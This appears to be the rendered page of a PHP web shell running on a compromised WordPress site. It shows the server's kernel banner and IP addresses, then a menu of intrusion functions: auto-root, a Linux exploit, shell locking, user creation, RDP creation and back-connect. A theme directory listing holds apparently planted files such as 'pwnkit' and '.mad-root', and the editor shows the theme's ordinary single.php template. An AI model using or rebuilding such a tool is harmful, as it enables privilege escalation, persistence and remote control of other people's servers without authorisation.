Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
arise /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
tgm
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.58
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
5.76
KB
-rw-r--r--
comments.php
1.16
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content.php
3.59
KB
-rw-r--r--
footer.php
3.28
KB
-rw-r--r--
functions.php
10.68
KB
-rw-r--r--
functionsbak.php
10.19
KB
-rw-r--r--
header.php
5.03
KB
-rw-r--r--
index.php
1.31
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
navigation.php
677
B
-rw-r--r--
page.php
2.29
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
4.58
KB
-rw-r--r--
screenshot.png
988.36
KB
-rw-r--r--
search.php
1.3
KB
-rw-r--r--
searchform.php
865
B
-rw-r--r--
sidebar.php
1.24
KB
-rw-r--r--
single.php
5.03
KB
-rw-r--r--
style.css
85.71
KB
-rw-r--r--
woocommerce.php
1.53
KB
-rw-r--r--
wpml-config.xml
714
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php /** * The template for displaying all single posts. * * @package Theme Freesia * @subpackage Arise * @since Arise 1.0 */ get_header(); $arise_settings = arise_get_theme_options(); global $arise_content_layout; if( $post ) { $layout = get_post_meta( $post->ID, 'arise_sidebarlayout', true ); } if( empty( $layout ) || is_archive() || is_search() || is_home() ) { $layout = 'default'; } if( 'default' == $layout ) { //Settings from customizer if(($arise_settings['arise_sidebar_layout_options'] != 'nosidebar') && ($arise_settings['arise_sidebar_layout_options'] != 'fullwidth')){ ?> <div id="primary"> <?php } }else{ // for page/ post if(($layout != 'no-sidebar') && ($layout != 'full-width')){ ?> <div id="primary"> <?php } }?> <div id="main"> <?php global $arise_settings; if( have_posts() ) { while( have_posts() ) { the_post(); ?> <section id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <?php $format = get_post_format(); ?> <article class="format-<?php echo $format; ?>"> <header class="entry-header"> <?php $entry_format_meta_blog = $arise_settings['arise_entry_meta_blog']; if($entry_format_meta_blog == 'show-meta' ){?> <div class="entry-meta clearfix"> <?php if ( current_theme_supports( 'post-formats', $format ) ) { printf( '<span class="entry-format">%1$s<a href="%2$s">%3$s</a></span>', sprintf( ''), esc_url( get_post_format_link( $format ) ), get_post_format_string( $format ) ); } ?> <span class="author vcard"><a href="<?php echo get_author_posts_url( get_the_author_meta( 'ID' ) ); ?>" title="<?php the_author(); ?>"> <?php the_author(); ?> </a></span> <span class="posted-on"><a title="<?php echo esc_attr( get_the_time() ); ?>" href="<?php the_permalink(); ?>"> <?php the_time( get_option( 'date_format' ) ); ?> </a></span> <?php if ( comments_open() ) { ?> <span class="comments"> <?php comments_popup_link( __( 'No Comments', 'arise' ), __( '1 Comment', 'arise' ), __( '% Comments', 'arise' ), '', __( 'Comments Off', 'arise' ) ); ?> </span> <?php } ?> </div> <!-- .entry-meta --> <?php } ?> </header> <!-- .entry-header --> <?php $featured_image_display = $arise_settings['arise_single_post_image']; if($featured_image_display == 'on'): if( has_post_thumbnail() ) { ?> <figure class="post-featured-image"> <a href="<?php the_permalink();?>" title="<?php echo the_title_attribute('echo=0'); ?>"> <?php the_post_thumbnail(); ?> </a> </figure><!-- end.post-featured-image --> <?php } endif; ?> <div class="entry-content clearfix"> <?php the_content(); wp_link_pages( array( 'before' => '<div style="clear: both;"></div><div class="pagination clearfix">'.__( 'Pages:', 'arise' ), 'after' => '</div>', 'link_before' => '<span>', 'link_after' => '</span>', 'pagelink' => '%', 'echo' => 1 ) ); ?> </div> <!-- .entry-content --> <?php if( is_single() ) { $tag_list = get_the_tag_list( '', __( ' ', 'arise' ) ); $disable_entry_format = $arise_settings['arise_entry_format_blog']; if($disable_entry_format =='show' || $disable_entry_format =='show-button' || $disable_entry_format =='hide-button'){ ?> <footer class="entry-meta clearfix"> <span class="cat-links"> <?php _e('Category : ','arise'); the_category(', '); ?> </span> <!-- .cat-links --> <?php $tag_list = get_the_tag_list( '', __( ', ', 'arise' ) ); if(!empty($tag_list)){ ?> <span class="tag-links"> <?php echo $tag_list; ?> </span> <!-- .tag-links --> <?php } ?> </footer> <!-- .entry-meta --> <?php } } if ( is_single() ) { if( is_attachment() ) { ?> <ul class="default-wp-page clearfix"> <li class="previous"> <?php previous_image_link( false, __( '← Previous', 'arise' ) ); ?> </li> <li class="next"> <?php next_image_link( false, __( 'Next →', 'arise' ) ); ?> </li> </ul> <?php } else { ?> <ul class="default-wp-page clearfix"> <li class="previous"> <?php previous_post_link( '%link', '<span class="meta-nav">' . _x( '←', 'Previous post link', 'arise' ) . '</span> %title' ); ?> </li> <li class="next"> <?php next_post_link( '%link', '%title <span class="meta-nav">' . _x( '→', 'Next post link', 'arise' ) . '</span>' ); ?> </li> </ul> <?php } } comments_template(); ?> </article> </section> <!-- .post --> <?php } } else { ?> <h1 class="entry-title"> <?php _e( 'No Posts Found.', 'arise' ); ?> </h1> <?php } ?> </div> <!-- #main --> <?php if( 'default' == $layout ) { //Settings from customizer if(($arise_settings['arise_sidebar_layout_options'] != 'nosidebar') && ($arise_settings['arise_sidebar_layout_options'] != 'fullwidth')): ?> </div> <!-- #primary --> <?php endif; }else{ // for page/post if(($layout != 'no-sidebar') && ($layout != 'full-width')){ echo '</div><!-- #primary -->'; } } get_sidebar(); get_footer(); ?>
Close